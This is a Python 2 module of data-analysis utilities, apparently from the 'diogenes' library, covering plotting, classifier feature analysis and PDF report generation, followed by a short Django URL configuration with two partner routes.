col_names = ['col1_value'] + ['{}'.format(col2_val) for col2_val in
col2_unique]
ret = convert_to_sa(crosstab_rows, col_names=col_names)
if verbose:
pprint_sa(ret)
return ret
def plot_simple_histogram(col, verbose=True):
"""Makes a histogram of values in a column
Parameters
----------
col : np.ndarray
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
col = utils.check_col(col)
override_xticks = False
if col.dtype.char in ('O', 'S'): # If col is strings, handle differently
counts = Counter(col)
categories = sorted(counts.keys())
hist = [counts[cat] for cat in categories]
bins = np.arange(len(categories) + 1)
override_xticks = True
else:
hist, bins = np.histogram(col, bins=50)
width = 0.7 * (bins[1] - bins[0])
center = (bins[:-1] + bins[1:]) / 2
f = plt.figure()
plt.bar(center, hist, align='center', width=width)
if override_xticks:
plt.xticks(center, categories)
if verbose:
plt.show()
return f
# all of the below take output from any func in grid_search or operate
def plot_prec_recall(labels, score, title='Prec/Recall', verbose=True):
"""Plot precision/recall curve
Parameters
----------
labels : np.ndarray
vector of ground truth
score : np.ndarray
vector of scores assigned by classifier (i.e.
clf.pred_proba(...)[-1] in sklearn)
title : str
title of plot
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
labels = utils.check_col(labels, argument_name='labels')
score = utils.check_col(score, argument_name='score')
# adapted from Rayid's prec/recall code
y_true = labels
y_score = score
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(
y_true,
y_score)
precision_curve = precision_curve[:-1]
recall_curve = recall_curve[:-1]
pct_above_per_thresh = []
number_scored = len(y_score)
for value in pr_thresholds:
num_above_thresh = len(y_score[y_score>=value])
pct_above_thresh = num_above_thresh / float(number_scored)
pct_above_per_thresh.append(pct_above_thresh)
pct_above_per_thresh = np.array(pct_above_per_thresh)
fig = plt.figure()
ax1 = plt.gca()
ax1.plot(pct_above_per_thresh, precision_curve, 'b')
ax1.set_xlabel('percent of population')
ax1.set_ylabel('precision', color='b')
ax2 = ax1.twinx()
ax2.plot(pct_above_per_thresh, recall_curve, 'r')
ax2.set_ylabel('recall', color='r')
plt.title(title)
if verbose:
fig.show()
return fig
def plot_roc(labels, score, title='ROC', verbose=True):
"""Plot ROC curve
Parameters
----------
labels : np.ndarray
vector of ground truth
score : np.ndarray
vector of scores assigned by classifier (i.e.
clf.pred_proba(...)[-1] in sklearn)
title : str
title of plot
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
labels = utils.check_col(labels, argument_name='labels')
score = utils.check_col(score, argument_name='score')
# adapted from Rayid's prec/recall code
fpr, tpr, thresholds = roc_curve(labels, score)
fpr = fpr
tpr = tpr
pct_above_per_thresh = []
number_scored = len(score)
for value in thresholds:
num_above_thresh = len(score[score>=value])
pct_above_thresh = num_above_thresh / float(number_scored)
pct_above_per_thresh.append(pct_above_thresh)
pct_above_per_thresh = np.array(pct_above_per_thresh)
fig = plt.figure()
ax1 = plt.gca()
ax1.plot(pct_above_per_thresh, fpr, 'b')
ax1.set_xlabel('percent of population')
ax1.set_ylabel('fpr', color='b')
ax2 = ax1.twinx()
ax2.plot(pct_above_per_thresh, tpr, 'r')
ax2.set_ylabel('tpr', color='r')
plt.title(title)
if verbose:
fig.show()
return fig
def plot_box_plot(col, title=None, verbose=True):
"""Makes a box plot for a feature
Parameters
----------
col : np.array
title : str or None
title of a plot
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
col = utils.check_col(col)
fig = plt.figure()
boxplot(col)
if title:
plt.title(title)
#add col_name to graphn
if verbose:
plt.show()
return fig
def get_top_features(clf, M=None, col_names=None, n=10, verbose=True):
"""Gets the top features for a fitted clf
Parameters
----------
clf : sklearn.base.BaseEstimator
Fitted classifier with a feature_importances_ attribute
M : numpy.ndarray or None
Structured array corresponding to fitted clf. Used here to deterimine
column names
col_names : list of str or None
List of column names corresponding to fitted clf.
n : int
Number of features to return
verbose : boolean
iff True, prints ranked features
Returns
-------
numpy.ndarray
structured array with top feature names and scores
"""
if not isinstance(clf, BaseEstimator):
raise ValueError('clf must be an instance of sklearn.Base.BaseEstimator')
scores = clf.feature_importances_
if col_names is None:
if is_sa(M):
col_names = M.dtype.names
else:
col_names = ['f{}'.format(i) for i in xrange(len(scores))]
else:
col_names = utils.check_col_names(col_names, n_cols = scores.shape[0])
ranked_name_and_score = [(col_names[x], scores[x]) for x in
scores.argsort()[::-1]]
ranked_name_and_score = convert_to_sa(
ranked_name_and_score[:n],
col_names=('feat_name', 'score'))
if verbose:
pprint_sa(ranked_name_and_score)
return ranked_name_and_score
# TODO features form top % of clfs
def get_roc_auc(labels, score, verbose=True):
"""return area under ROC curve
Parameters
----------
labels : np.ndarray
vector of ground truth
score : np.ndarray
vector of scores assigned by classifier (i.e.
clf.pred_proba(...)[-1] in sklearn)
verbose : boolean
iff True, prints area under the curve
Returns
-------
float
area under the curve
"""
labels = utils.check_col(labels, argument_name='labels')
score = utils.check_col(score, argument_name='score')
auc_score = roc_auc_score(labels, score)
if verbose:
print 'ROC AUC: {}'.format(auc_score)
return auc_score
def plot_correlation_matrix(M, verbose=True):
"""Plot correlation between variables in M
Parameters
----------
M : numpy.ndarray
structured array
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
# http://glowingpython.blogspot.com/2012/10/visualizing-correlation-matrices.html
# TODO work on structured arrays or not
# TODO ticks are col names
M = utils.check_sa(M)
names = M.dtype.names
M = cast_np_sa_to_nd(M)
#set rowvar =0 for rows are items, cols are features
cc = np.corrcoef(M, rowvar=0)
fig = plt.figure()
plt.pcolor(cc)
plt.colorbar()
plt.yticks(np.arange(0.5, M.shape[1] + 0.5), range(0, M.shape[1]))
plt.xticks(np.arange(0.5, M.shape[1] + 0.5), range(0, M.shape[1]))
if verbose:
plt.show()
return fig
def plot_correlation_scatter_plot(M, verbose=True):
"""Makes a grid of scatter plots representing relationship between variables
Each scatter plot is one variable plotted against another variable
Parameters
----------
M : numpy.ndarray
structured array
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
# TODO work for all three types that M might be
# TODO ignore classification variables
# adapted from the excellent
# http://stackoverflow.com/questions/7941207/is-there-a-function-to-make-scatterplot-matrices-in-matplotlib
M = utils.check_sa(M)
numdata = M.shape[0]
numvars = len(M.dtype)
names = M.dtype.names
fig, axes = plt.subplots(numvars, numvars)
fig.subplots_adjust(hspace=0.05, wspace=0.05)
for ax in axes.flat:
# Hide all ticks and labels
ax.xaxis.set_visible(False)
ax.yaxis.set_visible(False)
# Set up ticks only on one side for the "edge" subplots...
if ax.is_first_col():
ax.yaxis.set_ticks_position('left')
if ax.is_last_col():
ax.yaxis.set_ticks_position('right')
if ax.is_first_row():
ax.xaxis.set_ticks_position('top')
if ax.is_last_row():
ax.xaxis.set_ticks_position('bottom')
# Plot the M.
for i, j in zip(*np.triu_indices_from(axes, k=1)):
for x, y in [(i,j), (j,i)]:
axes[x,y].plot(M[M.dtype.names[x]], M[M.dtype.names[y]], '.')
# Label the diagonal subplots...
for i, label in enumerate(names):
axes[i,i].annotate(label, (0.5, 0.5), xycoords='axes fraction',
ha='center', va='center')
# Turn on the proper x or y axes ticks.
for i, j in zip(range(numvars), it.cycle((-1, 0))):
axes[j,i].xaxis.set_visible(True)
axes[i,j].yaxis.set_visible(True)
if verbose:
plt.show()
return fig
def plot_kernel_density(col, verbose=True):
"""Plots kernel density function of column
From:
https://jakevdp.github.io/blog/2013/12/01/kernel-density-estimation/
Parameters
----------
col : np.ndarray
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
"""
#address pass entire matrix
# TODO respect missing_val
# TODO what does n do?
col = utils.check_col(col)
x_grid = np.linspace(min(col), max(col), 1000)
grid = GridSearchCV(KernelDensity(), {'bandwidth': np.linspace(0.1,1.0,30)}, cv=20) # 20-fold cross-validation
grid.fit(col[:, None])
kde = grid.best_estimator_
pdf = np.exp(kde.score_samples(x_grid[:, None]))
fig, ax = plt.subplots()
#fig = plt.figure()
ax.plot(x_grid, pdf, linewidth=3, alpha=0.5, label='bw=%.2f' % kde.bandwidth)
ax.hist(col, 30, fc='gray', histtype='stepfilled', alpha=0.3, normed=True)
ax.legend(loc='upper left')
ax.set_xlim(min(col), max(col))
if verbose:
plt.show()
return fig
def plot_on_timeline(col, verbose=True):
"""Plots points on a timeline
Parameters
----------
col : np.array
verbose : boolean
iff True, display the graph
Returns
-------
matplotlib.figure.Figure
Figure containing plot
Returns
-------
matplotlib.figure.Figure
"""
col = utils.check_col(col)
# http://stackoverflow.com/questions/1574088/plotting-time-in-python-with-matplotlib
if is_nd(col):
col = col.astype(datetime)
dates = matplotlib.dates.date2num(col)
fig = plt.figure()
plt.plot_date(dates, [0] * len(dates))
if verbose:
plt.show()
return fig
def _feature_pair_report(pair_and_values,
description='pairs',
measurement='value',
note=None,
n=10):
print '-' * 80
print description
print '-' * 80
print 'feature pair : {}'.format(measurement)
for pair, value in it.islice(pair_and_values, n):
print '{} : {}'.format(pair, value)
if note is not None:
print '* {}'.format(note)
print
def feature_pairs_in_tree(dt):
"""Lists subsequent features sorted by importance
Parameters
----------
dt : sklearn.tree.DecisionTreeClassifer
Returns
-------
list of list of tuple of int :
Going from inside to out:
1. Each int is a feature that a node split on
2. If two ints appear in the same tuple, then there was a node
that split on the second feature immediately below a node
that split on the first feature
3. Tuples appearing in the same inner list appear at the same
depth in the tree
4. The outer list describes the entire tree
"""
if not isinstance(dt, DecisionTreeClassifier):
raise ValueError('dt must be an sklearn.tree.DecisionTreeClassifier')
t = dt.tree_
feature = t.feature
children_left = t.children_left
children_right = t.children_right
result = []
if t.children_left[0] == TREE_LEAF:
return result
next_queue = [0]
while next_queue:
this_queue = next_queue
next_queue = []
results_this_depth = []
while this_queue:
node = this_queue.pop()
left_child = children_left[node]
right_child = children_right[node]
if children_left[left_child] != TREE_LEAF:
results_this_depth.append(tuple(sorted(
(feature[node],
feature[left_child]))))
next_queue.append(left_child)
if children_left[right_child] != TREE_LEAF:
results_this_depth.append(tuple(sorted(
(feature[node],
feature[right_child]))))
next_queue.append(right_child)
result.append(results_this_depth)
result.pop() # The last results are always empty
return result
def feature_pairs_in_rf(rf, weight_by_depth=None, verbose=True, n=10):
"""Describes the frequency of features appearing subsequently in each tree
in a random forest
Parameters
----------
rf : sklearn.ensemble.RandomForestClassifier
Fitted random forest
weight_by_depth : iterable or None
Weights to give to each depth in the "occurences weighted by depth
metric"
weight_by_depth is a vector. The 0th entry is the weight of being at
depth 0; the 1st entry is the weight of being at depth 1, etc.
If not provided, wdiogenes are linear with negative depth. If
the provided vector is not as long as the number of depths, then
remaining depths are weighted with 0
verbose : boolean
iff True, prints metrics to console
n : int
Prints the top-n-scoring feature pairs to console if verbose==True
Returns
-------
(collections.Counter, list of collections.Counter, dict, dict)
A tuple with a number of metrics
1. A Counter of cooccuring feature pairs at all depths
2. A list of Counters of feature pairs. Element 0 corresponds to
depth 0, element 1 corresponds to depth 1 etc.
3. A dict where keys are feature pairs and values are the average
depth of those feature pairs
4. A dict where keys are feature pairs and values are the number
of occurences of those feature pairs weighted by depth
"""
if not isinstance(rf, RandomForestClassifier):
raise ValueError(
'rf must be an sklearn.Ensemble.RandomForestClassifier')
pairs_by_est = [feature_pairs_in_tree(est) for est in rf.estimators_]
pairs_by_depth = [list(it.chain(*pair_list)) for pair_list in
list(it.izip_longest(*pairs_by_est, fillvalue=[]))]
pairs_flat = list(it.chain(*pairs_by_depth))
depths_by_pair = {}
for depth, pairs in enumerate(pairs_by_depth):
for pair in pairs:
try:
depths_by_pair[pair] += [depth]
except KeyError:
depths_by_pair[pair] = [depth]
counts_by_pair=Counter(pairs_flat)
count_pairs_by_depth = [Counter(pairs) for pairs in pairs_by_depth]
depth_len = len(pairs_by_depth)
if weight_by_depth is None:
weight_by_depth = [(depth_len - float(depth)) / depth_len for depth in
xrange(depth_len)]
weight_filler = it.repeat(0.0, depth_len - len(weight_by_depth))
wdiogenes = list(it.chain(weight_by_depth, weight_filler))
average_depth_by_pair = {pair: float(sum(depths)) / len(depths) for
pair, depths in depths_by_pair.iteritems()}
weighted = {pair: sum([wdiogenes[depth] for depth in depths])
for pair, depths in depths_by_pair.iteritems()}
if verbose:
print '=' * 80
print 'RF Subsequent Pair Analysis'
print '=' * 80
print
_feature_pair_report(
counts_by_pair.most_common(),
'Overall Occurrences',
'occurrences',
n=n)
_feature_pair_report(
sorted([item for item in average_depth_by_pair.iteritems()],
key=lambda item: item[1]),
'Average depth',
'average depth',
'Max depth was {}'.format(depth_len - 1),
n=n)
_feature_pair_report(
sorted([item for item in weighted.iteritems()],
key=lambda item: item[1]),
'Occurrences weighted by depth',
'sum weight',
'Wdiogenes for depth 0, 1, 2, ... were: {}'.format(wdiogenes),
n=n)
for depth, pairs in enumerate(count_pairs_by_depth):
_feature_pair_report(
pairs.most_common(),
'Occurrences at depth {}'.format(depth),
'occurrences',
n=n)
return (counts_by_pair, count_pairs_by_depth, average_depth_by_pair,
weighted)
class ReportError(Exception):
"""Error generated by Report"""
pass
class Report(object):
"""Creates pdf reports.
Reports can either be associated with a particular
diogenes.grid_search.experiment.Experiment or it can simply be used as
a way to concatenate figures, text, and tables
Parameters
----------
exp : diogenes.grid_search.experiment.Experiment or None
Experiment used to make figures. Optional.
report_path : path of the generated pdf
"""
def __init__(self, exp=None, report_path='report.pdf'):
self.__exp = exp
if exp is not None:
self.__back_indices = {trial: i for i, trial in enumerate(exp.trials)}
self.__objects = []
self.__tmp_folder = 'diogenes_temp'
if not os.path.exists(self.__tmp_folder):
os.mkdir(self.__tmp_folder)
self.__html_src_path = os.path.join(self.__tmp_folder,
'{}.html'.format(uuid.uuid4()))
self.__report_path = report_path
def __html_escape(self, s):
"""Returns a string with all its html-averse characters html escaped"""
return cgi.escape(s).encode('ascii', 'xmlcharrefreplace')
def __html_format(self, fmt, *args, **kwargs):
clean_args = [self.__html_escape(str(arg)) for arg in args]
clean_kwargs = {key: self.__html_escape(str(kwargs[key])) for
key in kwargs}
return fmt.format(*clean_args, **clean_kwargs)
def to_pdf(self, options={}, verbose=True):
"""Generates a pdf
Parameters
----------
options : dict
options are pdfkit.from_url options. See
https://pypi.python.org/pypi/pdfkit
verbose : bool
iff True, gives output regarding pdf creation
Returns
-------
Path of generated pdf
"""
if verbose:
print 'Generating report...'
with open(self.__html_src_path, 'w') as html_out:
html_out.write(self.__get_header())
html_out.write('\n'.join(self.__objects))
html_out.write(self.__get_footer())
if not verbose:
options['quiet'] = ''
pdfkit.from_url(self.__html_src_path, self.__report_path,
options=options)
report_path = self.get_report_path()
if verbose:
print 'Report written to {}'.format(report_path)
return report_path
def __np_to_html_table(self, sa, fout, show_shape=False):
if show_shape:
fout.write('<p>table of shape: ({},{})</p>'.format(
len(sa),
len(sa.dtype)))
fout.write('<p><table>\n')
header = '<tr>{}</tr>\n'.format(
''.join(
[self.__html_format(
'<th>{}</th>',
name) for
name in sa.dtype.names]))
fout.write(header)
data = '\n'.join(
['<tr>{}</tr>'.format(
''.join(
[self.__html_format(
'<td>{}</td>',
cell) for
cell in row])) for
row in sa])
fout.write(data)
fout.write('\n')
fout.write('</table></p>')
def get_report_path(self):
"""Returns path of generated pdf"""
return os.path.abspath(self.__report_path)
def __get_header(self):
# Thanks to http://stackoverflow.com/questions/13516534/how-to-avoid-page-break-inside-table-row-for-wkhtmltopdf
# For not page breaking in the middle of tables
return ('<!DOCTYPE html>\n'
'<html>\n'
'<head>\n'
'<style>\n'
'table td, th {\n'
' border: 1px solid black;\n'
'}\n'
'table {\n'
' border-collapse: collapse;\n'
'}\n'
'tr:nth-child(even) {\n'
' background: #CCC\n'
'}\n'
'tr:nth-child(odd) {\n'
' background: white\n'
'}\n'
'table, tr, td, th, tbody, thead, tfoot {\n'
' page-break-inside: avoid !important;\n'
'}\n'
'</style>\n'
'</head>\n'
'<body>\n')
def add_subreport(self, subreport):
"""Incorporates another Report into this one
Parameters
----------
subreport : Report
report to add
"""
self.__objects += subreport.__objects
def __get_footer(self):
return '\n</body>\n</html>\n'
def add_heading(self, heading, level=2):
"""Adds a heading to the report
Parameters
----------
heading : str
text of heading
level : int
heading level (1 corresponds to html h1, 2 corresponds to
html h2, etc)
"""
self.__objects.append(self.__html_format(
'<h{}>{}</h{}>',
level,
heading,
level))
def add_text(self, text):
"""Adds block of text to report"""
self.__objects.append(self.__html_format(
'<p>{}</p>',
text))
def add_table(self, M):
"""Adds structured array to report"""
M = utils.check_sa(M)
sio = StringIO.StringIO()
self.__np_to_html_table(M, sio)
self.__objects.append(sio.getvalue())
def add_fig(self, fig):
"""Adds matplotlib.figure.Figure to report"""
# So we don't get pages with nothing but one figure on them
fig.set_figheight(5.0)
filename = 'fig_{}.png'.format(str(uuid.uuid4()))
path = os.path.join(self.__tmp_folder, filename)
fig.savefig(path)
self.__objects.append('<img src="{}">'.format(filename))
def add_summary_graph(self, measure):
"""Adds a graph to report that summarizes across an Experiment
Parameters
----------
measure : str
Function of Experiment to call. The function must return a dict of
Trial: score. Examples are 'average_score' and 'roc_auc'
"""
if self.__exp is None:
raise ReportError('No experiment provided for this report. '
'Cannot add summary graphs.')
results = [(trial, score, self.__back_indices[trial]) for
trial, score in getattr(self.__exp, measure)().iteritems()]
results_sorted = sorted(
results,
key=lambda result: result[1],
reverse=True)
y = [result[1] for result in results_sorted]
x = xrange(len(results))
fig = plt.figure()
plt.bar(x, y)
fig.set_size_inches(8, fig.get_size_inches()[1])
maxy = max(y)
for rank, result in enumerate(results_sorted):
plt.text(rank, result[1], '{}'.format(result[2]))
plt.ylabel(measure)
self.add_fig(fig)
plt.close()
def add_summary_graph_roc_auc(self):
"""Adds a graph to report that summarizes roc_auc across Experiment"""
self.add_summary_graph('roc_auc')
def add_summary_graph_average_score(self):
"""Adds a graph to report that summarizes average_score across Experiment
"""
self.add_summary_graph('average_score')
def add_graph_for_best(self, func_name):
"""Adds a graph to report that gives performance of the best Trial
Parameters
----------
func_name : str
Name of a function that can be run on a Trial that returns a
figure. For example 'roc_curve' or 'prec_recall_curve'
"""
if self.__exp is None:
raise ReportError('No experiment provided for this report. '
'Cannot add graph for best trial.')
best_trial = max(
self.__exp.trials,
key=lambda trial: trial.average_score())
fig = getattr(best_trial, func_name)()
self.add_fig(fig)
self.add_text('Best trial is trial {} ({})]'.format(
self.__back_indices[best_trial],
best_trial))
plt.close()
def add_graph_for_best_roc(self):
"""Adds roc curve for best Trial in an experiment"""
self.add_graph_for_best('roc_curve')
def add_graph_for_best_prec_recall(self):
"""Adds prec/recall for best Trial in an experiment"""
self.add_graph_for_best('prec_recall_curve')
def add_legend(self):
"""
Adds a legend that shows which trial number in a summary graph
corresponds to which Trial
"""
if self.__exp is None:
raise ReportError('No experiment provided for this report. '
'Cannot add legend.')
list_of_tuple = [(str(i), str(trial)) for i, trial in
enumerate(self.__exp.trials)]
table = cast_list_of_list_to_sa(list_of_tuple, col_names=('Id', 'Trial'))
# display 10 at a time to give pdfkit an easier time with page breaks
start_row = 0
n_trials = len(list_of_tuple)
while start_row < n_trials:
self.add_table(table[start_row:start_row+9])
start_row += 9
| StarcoderdataPython |
6559614 | <gh_stars>1-10
from django.urls import path
from . import views
urlpatterns = [
path("detail", views.PartnerDetailView.as_view(), name="partner-detail"),
path("agreement", views.PartnerAgreementView.as_view(), name="partner-agreement"),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.